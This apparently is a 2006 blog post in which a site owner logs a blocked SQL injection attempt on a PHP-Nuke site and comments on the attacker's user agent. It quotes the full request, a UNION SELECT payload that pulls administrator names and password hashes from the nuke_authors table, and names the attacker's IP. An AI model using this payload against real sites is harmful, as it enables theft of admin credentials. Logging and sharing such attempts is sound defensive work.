Sep 9, 2006

201.200.22.146 Hacker

ADD ALARM: */select/* injection
modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0-0-pwd-0-aid/**/FROM/**/nuke_authors GET HTTP/1.1
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; simbar enabled; simbar={ff31d371-c0bf-4f98-ac32-ccaee7d5f828})
201.200.22.146

The above atempted union injection hack of the phpnuke database was detected and the ip autobanned by M&M Autoban.



One wonders why I am seeing a lot of hackers with simbar enabled in the user agent.
None of my regular visitors have simbar.

No comments: